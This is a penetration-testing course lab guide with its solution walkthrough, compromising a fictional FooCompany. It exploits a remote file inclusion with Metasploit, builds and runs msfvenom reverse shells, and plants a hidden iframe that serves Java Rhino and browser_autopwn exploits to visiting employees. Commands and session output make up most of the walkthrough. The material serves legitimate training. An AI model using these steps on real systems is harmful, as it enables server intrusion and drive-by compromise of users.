© 2018 Caendra, Inc.

| Hera for PTP | Blind Penetration Test 1

Your company has contracted you to perform a Penetration test against a new client. The
client relies upon FooHosting Inc. to host a dedicated web server on which different
organization’s websites are present. Your goal is to obtain access to the internal target
organization network, meaning you have to exploit one or more internal machines. You
know that the organization website offers a member’s area, that is daily browsed by the
employees of the organization to perform different tasks.

Target organization: FooCompany

Scope: The client organization defined as scope of tests as:

• Web Server IP address: 10.100.0.100

• Any corporate private address in the range: 192.168.78.0/24

The following image summarizes the Lab environment

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 2

 • Obtain access to one or more machines of the organization network

• You will know at the end

• Metasploit

In this lab there are no tasks to follow. You are completely free to move in the lab
environment, choose your next steps, use your own exploit and skills and your preferred
tools. Moreover, in this lab you also have to use web application knowledge and
exploitation.

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 3

Further information:

• Labs machines (like web server and internal organization machines) are not
connected to the internet.
• In order to connect to the target organization website, you have to insert the
following two static rules in your hosts file:

10.100.0.100 foocompany.com
10.100.0.100 members.foocompany.com

• Hosts path:
o Windows: C:\Windows\System32\drivers\etc\hosts
o Linux: /etc/hosts

The next page begins the lab solutions. Be sure to read them, only, when you have finished
your lab, or if you are stuck.

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 4

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 5
Since our connection to the target network passes through the web server, this could be a
good starting point.

The following is a screenshot of our /etc/hosts file, with the two entries that will allow
us to connect to the organization website:

By adding the previous two lines, we are now able to browse the organization website:

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 6

The first step after obtaining access to the client’s website is to probe for vulnerabilities.
Entering the members area, (members.foocompany.com) we can observe a potential
vulnerability to exploit. We can see in the URL, that the “pag” parameter references an
“announcement.txt” file on the webserver:

The first test is to check and see if we are able to open the file directly from the browser.
Entering the file name in the address field, we can see, we are able to read the
announcement.txt file:

The second test to perform was to see if this website was vulnerable to File inclusion
vulnerabilities. First, we can check to see what would happen if we insert a URL instead of
a file. The file we can use to test this is the organization’s website URL
(http://foocompany.com):

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 7

This test was successful, and we can see that the page contents of “foocompany.com” has
been included within the body of the index.php page. This means that the server is
vulnerable to a RFI (Remote File Inclusion) vulnerability.

With this information, we should be able to exploit the webserver.

There are several ways to achieve this goal, let's see some of them.

In order to exploit this vulnerability, we can use Metasploit, as it offers a specific module
that allows you to exploit RFI vulnerabilities, called php_include. The following is
an example of the exploit configuration.

msf > use exploit/unix/webapp/php_include

msf exploit(php_include) > set RHOST 10.100.0.100
RHOST => 10.100.0.100
msf exploit(php_include) > set PHPURI /index.php?pag=XXpathXX
PHPURI => /index.php?pag=XXpathXX
msf exploit(php_include) > set SRVHOST 172.16.5.20
SRVHOST => 172.168.5.33
msf exploit(php_include) > set PAYLOAD php/meterpreter/reverse_tcp

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 8

PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(php_include) > set LHOST 172.16.5.20
LHOST => 172.16.5.20
msf exploit(php_include) > exploit

[*] Started reverse handler on 172.16.5.20:4444

[*] Using URL: http://172.16.5.20/Tb44IeIC5pyIvC
[*] PHP include server started.
[*] Sending stage (38791 bytes) to 10.100.0.100
[*] Meterpreter session 1 opened (172.16.5.20:4444 -> 10.100.0.100:49852) at 2016-05-
09 11:52:01 +0200

When exploited, Metasploit will start a local webserver hosting a shell at

/Tb44IeIC5pyIvC. Then the module connects to the vulnerable website triggering the
vulnerability. This shell will start a Meterpreter Reverse TCP Session.

NOTE
When replicating this exploit, you may not be dropped into a meterpreter shell after a
session is opened, but we can hit the <enter> key after the session is opened, and then
interact with our session to get our meterpreter shell prompt:

msf exploit(php_include) > sessions

Active sessions
===============

Id Type Information Connection

-- ---- ----------- ----------
1 meterpreter php/php iis_user (0) @ WIN-OTZ1TW2ZPA1 172.16.5.20:4444 ->
10.100.0.100:49852 (10.100.0.100)

msf exploit(php_include) > sessions -i 1

[*] Starting interaction with 1...

meterpreter >

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 9

SESSION DIED PROBLEM
We notice that after a couple of seconds, our meterpreter session dies:

[*] 10.100.0.100 - Meterpreter session 1 closed. Reason: Died

This exploit method was partially successful. It was able to create a Meterpreter session,
but the session it would quickly die after some time, usually about 20 seconds or so.

We need to determine another method we can use to exploit this vulnerability. One way is
to quickly upload a PHP Shell or some other payload while our session is active, within our
20 second time-frame. In this case, we’ll upload self-generated Metasploit reverse tcp
payload executable, and then use another php include exploit to execute our executable
once our payload has been uploaded to the target web server.

First, let's create a Meterpreter Windows Reverse TCP payload using msfvenom:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.5.20 LPORT=5555

-f exe > shell.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes

Now, we need to upload this executable. First, since our first meterpreter has died, we need
to rerun the original php_include exploit module.

After we re-run the original exploit, and as soon as the session is opened, we need to
quickly interact with our session, and execute an upload command. The session should stay
alive just enough time for us to get our payload executable uploaded to the target.

meterpreter > upload shell.exe

[*] uploading : shell.exe -> shell.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): shell.exe -> shell.exe
[*] uploaded : shell.exe -> shell.exe
meterpreter >
[*] 10.100.0.100 - Meterpreter session 2 closed. Reason: Died

We now have our secondary payload uploaded to the target web server.

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 10

An important note to make, is that since we exploited a PHP vulnerability on the web
server, and from our meterpreter shell, we’ve uploaded our new payload, we can assume
that our “shell.exe” executable is likely now in the web root of the web server since our
exploit likely dropped us in the current working directory of the web server. We can easily
confirm this by browsing to the website and requesting our payload:

We’ve quickly confirmed our payload is on the web server.

At this point, we need to find a way to execute our uploaded shell.exe payload.

First, let’s make sure we have a handler up and listening ready for an incoming connection
from our payload once we execute it.

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 11

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.5.20
LHOST => 172.16.5.20
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.5.20:5555

[*] Starting the payload handler...

Next, in order to execute our payload which we’ve uploaded to the web server, we can use
the php/exec payload along with our previous php_include exploit module. Going
back to the exploit/unix/webapp/php_include module, we set a new payload, and our CMD
value, which is the name of our shell.exe executable:

msf exploit(php_include) > set payload php/exec

payload => php/exec
msf exploit(php_include) > set CMD shell.exe
CMD => shell.exe
msf exploit(php_include) > exploit
[*] Exploit running as background job.

[*] 10.100.0.100:80 - Using URL: http://172.16.5.20:8080/PHaCpzodhWqHa

[*] 10.100.0.100:80 - PHP include server started.
[*] Sending stage (179779 bytes) to 10.100.0.100
[*] Meterpreter session 3 opened (172.16.5.20:5555 -> 10.100.0.100:49170) at 2018-04-
30 17:59:09 -0400

msf exploit(unix/webapp/php_include) > sessions

Active sessions
===============

Id Name Type Information

Connection
-- ---- ---- ----------- ----
------
3 meterpreter x86/windows WIN-OTZ1TW2ZPA1\iis_user @ WIN-OTZ1TW2ZPA1
172.16.5.20:5555 -> 10.100.0.100:49170 (10.100.0.100)

msf exploit(unix/webapp/php_include) > sessions -i 3

[*] Starting interaction with 3...

meterpreter > getuid

Server username: WIN-OTZ1TW2ZPA1\iis_user
meterpreter >

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 12

And we should have a more stable meterpreter shell from the target web server at that
point.

A second alternative method for exploitation would have been to use a PHP Web Shell.

NOTE: Since, the machines in the lab are not connected to the internet, we must
provide the web-shell from our machine. To do this, there are several alternatives, we
will start a local webserver.

There are many PHP web shells we can use for our purposes, among the famous ones
there are c99, b374k, r57 and several more. In this example, we’re using the b374k
PHP shell.

To use the PHP web-shell, we would first need to host it on our attacker machine. We can
use python’s SimpleHTTPServer module to quickly stand-up a web server on port 80 on
our attacker machine from the same directory where our php shell is located:

root@kali:~# python -m SimpleHTTPServer 80

Next, we can use the RFI vulnerability to call our PHP shell on our attacker machine from
the web server:

URL: http://members.foocompany.com/index.php?pag=http://172.16.5.20/shell

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 13

Alternatively, rather than using a full PHP web shell like the above, if our only goal is to
upload a new Metasploit meterpreter payload executable, the following PHP code would be
enough, rather than using a full-fledged PHP Shell, and would provide us with a form we
can use to upload our executable.

<?php
if(isset($_POST["submit"])) {
$name = $_FILES['file_upload']['name'];
// Check for errors
if($_FILES['file_upload']['error'] > 0) die('An error ocurred');

// Upload file
if(!move_uploaded_file($_FILES['file_upload']['tmp_name'],$name))
die('Error uploading');

die('File uploaded successfully.');

}?>

<form method='post' enctype='multipart/form-data'>

File: <input type='file' name='file_upload'>
<input type="submit" value="Upload Image" name="submit">
</form>

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 14

We can then as we did previously, use the php/exec payload with the php_include exploit
to execute our uploaded shell.exe file, which would result in a more stable shell.

Once we have control of the victim server, we can start searching for useful information
that can help us reach our goals. Since this is the only connection between us and the
organization’s network (members area is browsed by organization employees), we can
think about how we can use the server to gain access to the organization’s machines.

What can we do with a Meterpreter session? Pivoting!

The first step was to use the victim server to perform sniffing on network and try to detect
any active devices. To do this, we can use the included Meterpreter module: sniffer.

We opt for this module because there is no need to install any software on the target web
server machine, giving us a great idea of what we may want to pivot to, based on the traffic
other potential targets are sending. Sniffer was configured as follows:

meterpreter > use sniffer

Loading extension sniffer...success.
meterpreter > sniffer_interfaces

1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false

wifi:false )
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true
dhcp:false wifi:false )

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 15

3 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false
dhcp:false wifi:false )

meterpreter > sniffer_start 2

[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 /tmp/sniff2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 434 packets (66843 bytes)
[*] Downloaded 100% (66843/66843)...
[*] Download completed, converting to PCAP...
[-] Corrupted packet data (length:11260)
[*] PCAP file written to /tmp/sniff2.pcap
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2

We can then analyze the results of the packet capture with WireShark:

root@kali:/tmp# wireshark sniff2.pcap

Once inside Wireshark, we can navigate to Statistics > Endpoints menu, and see that
there are two additional addresses in the victim network:

The newly discovered machines are: 192.168.75.5 and 192.168.78.25.

Analyzing the network traffic, we can also see that both of those machines try to connect to
the server and, both have outdated and vulnerable version of Java.

We can also determine through the packet capture, that both machines are attempting to
login to the members area. To continue the penetration test we can attempt to edit the
members webpage, and furthermore, insert a malicious frame that could point to a Java
exploit. This could potentially result in the compromise of client machines, and further our
foothold within the environment.

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 16

Searching exploit and vulnerabilities websites, we find that there are two Java versions and
both are vulnerable to the Java Rhino exploit.

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 17

There are two different Metasploit modules that we can use to achieve the goal of client
exploitation.

• auxiliary/server/browser_autopwn
• exploit/multi/browser/java_rhino

The first (browser_autopwn), uses a number of different browser exploits, while the
second (java_rhino) is more specific for our environment, since the clients found are both
vulnerable to this exploit. The reason why we choose to also use the “browser_autopwn”
module, is that we don’t know if there are other workstations vulnerable to different
exploits. This helps us maximize our chances of entering the corporate network through a
client-side exploit.

We can configure the modules as follows:

msf > use auxiliary/server/browser_autopwn

msf exploit(browser_autopwn) > set LHOST 172.16.5.20
LHOST => 172.16.5.20
msf exploit(browser_autopwn) > set SRVHOST 172.16.5.20
SRVHOST => 172.168.5.33
msf exploit(browser_autopwn) > exploit

[*] Auxiliary module execution completed

[*] Setup

[*] Starting exploit modules on host 172.16.5.20...

[*] --- Done, found 20 exploit modules

[*] Using URL: http://172.16.5.20:8080/y0kwSXkukVh

[*] Server started.

We can then insert this URL in the members area of the webserver.

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 18

The java_rhino module has the similar configuration to the browser_autopown
module.

msf > use exploit/multi/browser/java_rhino

msf exploit(java_rhino) > set SRVHOST 172.16.5.20
SRVHOST => 172.168.5.33
msf exploit(java_rhino) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(java_rhino) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(java_rhino) > set LHOST 172.16.5.20
LHOST => 172.16.5.20
msf exploit(java_rhino) > exploit

[*] Started reverse handler on 172.16.5.20:4444

[*] Using URL: http://172.16.5.20:8081/uo3eXen8t0I1n
[*] Server started.

This gives us another URL that we can use to exploit the target organization corporate
network.

Next, we inject a hidden iframe in the members area home page that loads our malicious
page each time someone visits the page.

To insert the code, we can use the Meterpreter session to download the index.php file.
Then, we can add the following code, and re-upload the index.php file to the web server:

…
if (isset($_GET['pag'])){
$variabile1=$_GET['pag'];
include($variabile1);

echo '<iframe src="http://172.16.5.20:8081/uo3eXen8t0I1n" width=1

height=1 style="visibility:hidde; position:absolute;"></iframe>';

}else{
…

Where http://172.16.5.20:8081/uo3eXen8t0I1n is the URL that points to the Java

Rhino exploit server.

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 19

Doing this change, made it so that every time someone visits the index page, and has a
vulnerable plugin, results in a Meterpreter session from the affected client, automatically.

All we have to do is wait for one of the vulnerable clients to visit the members page:

msf exploit(java_rhino) >

[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending Applet.jar
[*] Sending Applet.jar
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending stage (46089 bytes) to 192.168.78.25
[*] Meterpreter session 3 opened (172.16.5.20:4444 -> 192.168.78.25:42546) at 2016-
05-09 17:19:09 +0200
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending Applet.jar
[*] Sending Applet.jar
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending stage (46089 bytes) to 192.168.78.5
[*] Meterpreter session 4 opened (172.16.5.20:4444 -> 192.168.78.5:49812) at 2016-05-
09 17:19:22 +0200

Here is where we turn over the rest of the penetration test to you. There is much more to
be discovered. Document your work and don’t leave any stone untouched.

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 20